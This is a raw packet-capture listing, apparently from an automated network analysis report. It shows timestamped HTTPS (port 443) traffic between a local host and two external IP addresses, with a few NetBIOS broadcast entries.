                                                                                                                                                                  Jan 11, 2025 07:54:34.617404938 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.617528915 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.617671967 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.617726088 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.617954969 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.617989063 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.618007898 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.618248940 CET61038443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:34.623591900 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.623644114 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.623806953 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.623981953 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.624038935 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.624223948 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.624258995 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.624416113 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.624475956 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.624650002 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.624702930 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.624762058 CET50687443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:34.624855995 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.624994993 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.625031948 CET61038443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:34.625122070 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.625214100 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.625344038 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.625428915 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.625549078 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.625669003 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.625720024 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.625895023 CET61038443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:34.625946999 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.625977993 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.626142025 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.626230955 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.626235962 CET61038443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:34.626346111 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.626487017 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.626575947 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.626694918 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.626816988 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.626969099 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.632642031 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.632993937 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.633030891 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.633196115 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.633230925 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.633316040 CET61038443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:34.633404016 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.633481026 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.633652925 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.633728027 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.633866072 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.634037018 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.634103060 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.634121895 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.634212017 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.634329081 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.634418964 CET61038443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:34.634463072 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.634494066 CET61038443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:34.634566069 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.634687901 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.634809017 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.634927988 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.635049105 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.635154963 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.635294914 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.635380030 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.635498047 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.635622978 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.635744095 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.635797977 CET61038443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:34.635919094 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.635999918 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.636140108 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.636260986 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.636370897 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.636466980 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.636589050 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.636652946 CET61038443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:34.636723995 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.636831999 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.636954069 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.637000084 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.637062073 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.637428999 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.637437105 CET61038443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:34.637604952 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.637660027 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.637845039 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.637896061 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.638066053 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.638138056 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.638156891 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.647408009 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.647670031 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.647706032 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.647876978 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.648047924 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.648082018 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.648283005 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.648317099 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.648405075 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.648521900 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.648643970 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.648765087 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.648889065 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.648996115 CET65192443192.168.11.2023.213.53.31
                                                                                                                                                                  Jan 11, 2025 07:54:34.649087906 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.649168015 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.649302959 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.649323940 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.649507046 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.649558067 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.649650097 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.649769068 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.649889946 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.649955034 CET65192443192.168.11.2023.213.53.31
                                                                                                                                                                  Jan 11, 2025 07:54:34.650046110 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.650140047 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.650285959 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.650403976 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.650532007 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.650614023 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.650732994 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.650824070 CET65192443192.168.11.2023.213.53.31
                                                                                                                                                                  Jan 11, 2025 07:54:34.650871038 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.651017904 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.651102066 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.651278973 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.651371956 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.651489973 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.651571035 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.651693106 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.651818991 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.651933908 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.651954889 CET65192443192.168.11.2023.213.53.31
                                                                                                                                                                  Jan 11, 2025 07:54:34.652060032 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.652252913 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.655153036 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.655339956 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.655415058 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.655621052 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.655657053 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.655822039 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.655879021 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.656090975 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.656126022 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.656158924 CET65192443192.168.11.2023.213.53.31
                                                                                                                                                                  Jan 11, 2025 07:54:34.656255007 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.656275988 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.663078070 CET61038443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:34.671603918 CET4435068723.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.675657034 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.675698996 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.675887108 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.675930023 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.676120996 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.676162004 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.676254988 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.676376104 CET65192443192.168.11.2023.213.53.31
                                                                                                                                                                  Jan 11, 2025 07:54:34.676445961 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.676484108 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.676615953 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.676739931 CET65192443192.168.11.2023.213.53.31
                                                                                                                                                                  Jan 11, 2025 07:54:34.676810980 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.676898003 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.676991940 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.677098989 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.677233934 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.677309990 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.677432060 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.677553892 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.677678108 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.677799940 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.678044081 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.678083897 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.678128958 CET65192443192.168.11.2023.213.53.31
                                                                                                                                                                  Jan 11, 2025 07:54:34.678185940 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.678303957 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.678436995 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.678563118 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.678646088 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.678837061 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.678982019 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.679017067 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.679122925 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.679205894 CET65192443192.168.11.2023.213.53.31
                                                                                                                                                                  Jan 11, 2025 07:54:34.679303885 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.679390907 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.679438114 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.679524899 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.679651022 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.679770947 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.679789066 CET65192443192.168.11.2023.213.53.31
                                                                                                                                                                  Jan 11, 2025 07:54:34.679891109 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.680010080 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.680133104 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.680248976 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.680371046 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.680491924 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.680609941 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.680735111 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.680864096 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.680946112 CET65192443192.168.11.2023.213.53.31
                                                                                                                                                                  Jan 11, 2025 07:54:34.680999994 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.681098938 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.681217909 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.681337118 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.681982040 CET4436103823.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.683212042 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.683299065 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.683419943 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.683509111 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.683638096 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.683725119 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.683854103 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.683862925 CET65192443192.168.11.2023.213.53.31
                                                                                                                                                                  Jan 11, 2025 07:54:34.683976889 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.684103966 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.684222937 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.692877054 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.692922115 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.693083048 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.693116903 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.693147898 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.693350077 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.693389893 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.693468094 CET65192443192.168.11.2023.213.53.31
                                                                                                                                                                  Jan 11, 2025 07:54:34.693569899 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.693605900 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.693762064 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.693850994 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.693952084 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.694053888 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.694174051 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.694312096 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.694405079 CET65192443192.168.11.2023.213.53.31
                                                                                                                                                                  Jan 11, 2025 07:54:34.694406033 CET137137192.168.11.20192.168.11.255
                                                                                                                                                                  Jan 11, 2025 07:54:34.694406033 CET137137192.168.11.20192.168.11.255
                                                                                                                                                                  Jan 11, 2025 07:54:34.694406033 CET137137192.168.11.20192.168.11.255
                                                                                                                                                                  Jan 11, 2025 07:54:34.694436073 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.694567919 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.694657087 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.694783926 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.694900036 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.695034027 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.695204973 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.695324898 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.695382118 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.695547104 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.695684910 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.695693970 CET65192443192.168.11.2023.213.53.31
                                                                                                                                                                  Jan 11, 2025 07:54:34.695734024 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.695930004 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.695987940 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.696118116 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.696306944 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.696329117 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.701503038 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.701838970 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.701917887 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.702043056 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.702152014 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.702270985 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.702430964 CET65192443192.168.11.2023.213.53.31
                                                                                                                                                                  Jan 11, 2025 07:54:34.702538013 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.702574968 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.702657938 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.702830076 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.702872038 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.702971935 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.703083992 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.703212976 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.703382969 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.703505993 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.703522921 CET65192443192.168.11.2023.213.53.31
                                                                                                                                                                  Jan 11, 2025 07:54:34.703625917 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.703733921 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.703865051 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.703995943 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.711478949 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.711522102 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.711710930 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.711754084 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.711939096 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.711985111 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.711992025 CET65192443192.168.11.2023.213.53.31
                                                                                                                                                                  Jan 11, 2025 07:54:34.712085009 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.712259054 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.712301016 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.712483883 CET4436519223.213.53.31192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:34.712524891 CET4436519223.213.53.31192.168.11.20
